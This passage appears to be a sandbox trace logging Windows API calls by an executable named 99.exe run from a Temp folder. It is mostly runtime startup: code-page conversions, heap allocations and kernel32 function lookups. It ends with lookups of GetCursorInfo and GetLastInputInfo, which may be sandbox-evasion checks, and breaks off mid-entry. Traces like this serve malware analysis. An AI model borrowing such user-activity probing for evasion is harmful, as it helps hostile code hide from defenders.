returned="\"C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\99.exe\" " [0265.432] GetCommandLineW () returned="\"C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\99.exe\" " [0265.432] GetLastError () returned 0x7e [0265.432] SetLastError (dwErrCode=0x7e) [0265.432] GetLastError () returned 0x7e [0265.432] SetLastError (dwErrCode=0x7e) [0265.434] GetACP () returned 0x4e4 [0265.434] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x0, Size=0x220) returned 0x3253e0 [0265.434] IsValidCodePage (CodePage=0x4e4) returned 1 [0265.434] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18fec4 | out: lpCPInfo=0x18fec4) returned 1 [0265.434] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f78c | out: lpCPInfo=0x18f78c) returned 1 [0265.434] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda0, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0265.434] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda0, cbMultiByte=256, lpWideCharStr=0x18f528, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ") returned 256 [0265.434] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ", cchSrc=256, lpCharType=0x18f7a0 | out: lpCharType=0x18f7a0) returned 1 [0265.436] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda0, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0265.436] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda0, cbMultiByte=256, lpWideCharStr=0x18f4d8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ") returned 256 [0265.436] LoadLibraryExW (lpLibFileName="api-ms-win-core-localization-l1-2-1", hFile=0x0, dwFlags=0x800) returned 0x0 [0265.437] GetLastError () returned 0x7e [0265.437] GetProcAddress (hModule=0x769b0000, lpProcName="LCMapStringEx") returned 0x76a44d91 [0265.437] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0265.438] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ", cchSrc=256, lpDestStr=0x18f2c8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ") returned 256 [0265.438] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ", cchWideChar=256, lpMultiByteStr=0x18fca0, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ]\x1cÈUÜþ\x18", lpUsedDefaultChar=0x0) returned 256 [0265.438] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda0, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0265.438] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda0, cbMultiByte=256, lpWideCharStr=0x18f4f8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ䡿DĀ") returned 256 [0265.438] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ䡿DĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0265.438] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ䡿DĀ", cchSrc=256, lpDestStr=0x18f2e8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȈ") returned 256 [0265.438] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȈ", cchWideChar=256, lpMultiByteStr=0x18fba0, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ]\x1cÈUÜþ\x18", lpUsedDefaultChar=0x0) returned 256 [0265.442] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x0, Size=0x80) returned 0x3027f8 [0265.443] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x46d3c8, nSize=0x104 | out: lpFilename="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\99.exe" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\99.exe")) returned 0x2b [0265.444] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x34) returned 0x325608 [0265.444] RtlInitializeSListHead (in: ListHead=0x46cd18 | out: ListHead=0x46cd18) [0265.445] GetLastError () returned 0x0 [0265.445] SetLastError (dwErrCode=0x0) [0265.445] GetEnvironmentStringsW () returned 0x3281f8* [0265.445] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=::=::\\", cchWideChar=1443, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1443 [0265.445] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x0, Size=0x5a3) returned 0x328d48 [0265.446] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=::=::\\", cchWideChar=1443, lpMultiByteStr=0x328d48, cbMultiByte=1443, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=::=::\\", lpUsedDefaultChar=0x0) returned 1443 [0265.446] FreeEnvironmentStringsW (penv=0x3281f8) returned 1 [0265.446] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x9c) returned 0x302928 [0265.446] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x1f) returned 0x3280a0 [0265.448] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x2b) returned 0x31d9b0 [0265.448] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x37) returned 0x3029d0 [0265.448] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x3c) returned 0x311f80 [0265.448] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x31) returned 0x3281f8 [0265.448] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x18) returned 0x302880 [0265.448] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x24) returned 0x31d320 [0265.448] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x14) returned 0x328238 [0265.448] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0xd) returned 0x314ab0 [0265.448] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x1a) returned 0x3280c8 [0265.448] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x2e) returned 0x31d9e8 [0265.448] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x19) returned 0x3280f0 [0265.448] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x17) returned 0x328258 [0265.448] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0xe) returned 0x314ac8 [0265.448] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x95) returned 0x328278 [0265.448] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x3e) returned 0x311fc8 [0265.448] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x1b) returned 0x328118 [0265.448] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x1d) returned 0x328140 [0265.448] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x48) returned 0x319528 [0265.448] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x12) returned 0x328318 [0265.448] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x18) returned 0x328338 [0265.448] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x1b) returned 0x328168 [0265.448] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x24) returned 0x31d350 [0265.448] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x29) returned 0x31da20 [0265.448] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x1e) returned 0x328190 [0265.448] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x6b) returned 0x328358 [0265.449] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x17) returned 0x3283d0 [0265.449] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x14) returned 0x3283f0 [0265.449] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0xf) returned 0x314ae0 [0265.449] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x16) returned 0x328410 [0265.449] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x2a) returned 0x31da58 [0265.449] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x29) returned 0x31da90 [0265.449] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x16) returned 0x328430 [0265.449] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x13) returned 0x328468 [0265.449] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x1f) returned 0x3281b8 [0265.449] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x12) returned 0x328488 [0265.449] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x18) returned 0x3284a8 [0265.449] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x46) returned 0x319578 [0265.449] HeapFree (in: hHeap=0x300000, dwFlags=0x0, lpMem=0x328d48 | out: hHeap=0x300000) returned 1 [0265.452] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x769b0000 [0265.452] GetProcAddress (hModule=0x769b0000, lpProcName="InitializeConditionVariable") returned 0x77a18456 [0265.453] GetProcAddress (hModule=0x769b0000, lpProcName="SleepConditionVariableCS") returned 0x76a450d2 [0265.453] GetProcAddress (hModule=0x769b0000, lpProcName="WakeAllConditionVariable") returned 0x77a4409d [0265.453] RtlInitializeConditionVariable () returned 0x46ccd0 [0265.454] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x769b0000 [0265.454] GetProcAddress (hModule=0x769b0000, lpProcName="FlsAlloc") returned 0x769c4ee3 [0265.455] GetProcAddress (hModule=0x769b0000, lpProcName="FlsFree") returned 0x769c354f [0265.455] GetProcAddress (hModule=0x769b0000, lpProcName="FlsGetValue") returned 0x769c1252 [0265.455] GetProcAddress (hModule=0x769b0000, lpProcName="FlsSetValue") returned 0x769c41c0 [0265.456] GetProcAddress (hModule=0x769b0000, lpProcName="InitializeCriticalSectionEx") returned 0x769c4ce0 [0265.456] GetProcAddress (hModule=0x769b0000, lpProcName="InitOnceExecuteOnce") returned 0x769dd5f7 [0265.467] GetProcAddress (hModule=0x769b0000, lpProcName="CreateEventExW") returned 0x76a446ab [0265.467] GetProcAddress (hModule=0x769b0000, lpProcName="CreateSemaphoreW") returned 0x769dca32 [0265.467] GetProcAddress (hModule=0x769b0000, lpProcName="CreateSemaphoreExW") returned 0x76a44735 [0265.468] GetProcAddress (hModule=0x769b0000, lpProcName="CreateThreadpoolTimer") returned 0x769dee4e [0265.468] GetProcAddress (hModule=0x769b0000, lpProcName="SetThreadpoolTimer") returned 0x77a2441c [0265.469] GetProcAddress (hModule=0x769b0000, lpProcName="WaitForThreadpoolTimerCallbacks") returned 0x77a4c50e [0265.469] GetProcAddress (hModule=0x769b0000, lpProcName="CloseThreadpoolTimer") returned 0x77a4c381 [0265.470] GetProcAddress (hModule=0x769b0000, lpProcName="CreateThreadpoolWait") returned 0x769df058 [0265.470] GetProcAddress (hModule=0x769b0000, lpProcName="SetThreadpoolWait") returned 0x77a305d7 [0265.470] GetProcAddress (hModule=0x769b0000, lpProcName="CloseThreadpoolWait") returned 0x77a4ca24 [0265.471] GetProcAddress (hModule=0x769b0000, lpProcName="FlushProcessWriteBuffers") returned 0x77a00b8c [0265.471] GetProcAddress (hModule=0x769b0000, lpProcName="FreeLibraryWhenCallbackReturns") returned 0x77abfde8 [0265.472] GetProcAddress (hModule=0x769b0000, lpProcName="GetCurrentProcessorNumber") returned 0x77a51e1d [0265.472] GetProcAddress (hModule=0x769b0000, lpProcName="CreateSymbolicLinkW") returned 0x76a3d181 [0265.473] GetProcAddress (hModule=0x769b0000, lpProcName="GetCurrentPackageId") returned 0x0 [0265.473] GetProcAddress (hModule=0x769b0000, lpProcName="GetTickCount64") returned 0x769deeb0 [0265.474] GetProcAddress (hModule=0x769b0000, lpProcName="GetFileInformationByHandleEx") returned 0x769dc767 [0265.474] GetProcAddress (hModule=0x769b0000, lpProcName="SetFileInformationByHandle") returned 0x769ecbec [0265.474] GetProcAddress (hModule=0x769b0000, lpProcName="GetSystemTimePreciseAsFileTime") returned 0x0 [0265.475] GetProcAddress (hModule=0x769b0000, lpProcName="InitializeConditionVariable") returned 0x77a18456 [0265.475] GetProcAddress (hModule=0x769b0000, lpProcName="WakeConditionVariable") returned 0x77a87de4 [0265.476] GetProcAddress (hModule=0x769b0000, lpProcName="WakeAllConditionVariable") returned 0x77a4409d [0265.476] GetProcAddress (hModule=0x769b0000, lpProcName="SleepConditionVariableCS") returned 0x76a450d2 [0265.477] GetProcAddress (hModule=0x769b0000, lpProcName="InitializeSRWLock") returned 0x77a18456 [0265.477] GetProcAddress (hModule=0x769b0000, lpProcName="AcquireSRWLockExclusive") returned 0x77a129f1 [0265.478] GetProcAddress (hModule=0x769b0000, lpProcName="TryAcquireSRWLockExclusive") returned 0x77a24892 [0265.478] GetProcAddress (hModule=0x769b0000, lpProcName="ReleaseSRWLockExclusive") returned 0x77a129ab [0265.478] GetProcAddress (hModule=0x769b0000, lpProcName="SleepConditionVariableSRW") returned 0x76a45114 [0265.479] GetProcAddress (hModule=0x769b0000, lpProcName="CreateThreadpoolWork") returned 0x769dee15 [0265.479] GetProcAddress (hModule=0x769b0000, lpProcName="SubmitThreadpoolWork") returned 0x77a58491 [0265.480] GetProcAddress (hModule=0x769b0000, lpProcName="CloseThreadpoolWork") returned 0x77a4d8e2 [0265.480] GetProcAddress (hModule=0x769b0000, lpProcName="CompareStringEx") returned 0x76a44c51 [0265.480] GetProcAddress (hModule=0x769b0000, lpProcName="GetLocaleInfoEx") returned 0x76a44cf1 [0265.481] GetProcAddress (hModule=0x769b0000, lpProcName="LCMapStringEx") returned 0x76a44d91 [0265.483] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x800) returned 0x329850 [0265.485] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0265.485] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x43061a) returned 0x0 [0265.487] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x0, Size=0x40) returned 0x312010 [0265.489] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x0, Size=0x30) returned 0x31dac8 [0265.494] RtlSizeHeap (HeapHandle=0x300000, Flags=0x0, MemoryPointer=0x3027f8) returned 0x80 [0265.494] RtlReAllocateHeap (Heap=0x300000, Flags=0x0, Ptr=0x3027f8, Size=0x100) returned 0x32a4a0 [0265.496] GetModuleHandleA (lpModuleName="User32.dll") returned 0x773b0000 [0265.496] GetProcAddress (hModule=0x773b0000, lpProcName="GetCursorInfo") returned 0x7742812f [0265.497] LoadLibraryA (lpLibFileName="User32.dll") returned 0x773b0000 [0265.497] GetProcAddress (hModule=0x773b0000, lpProcName="GetLastInputInfo") returned 0x773db382 [0265.497] LoadLibraryA 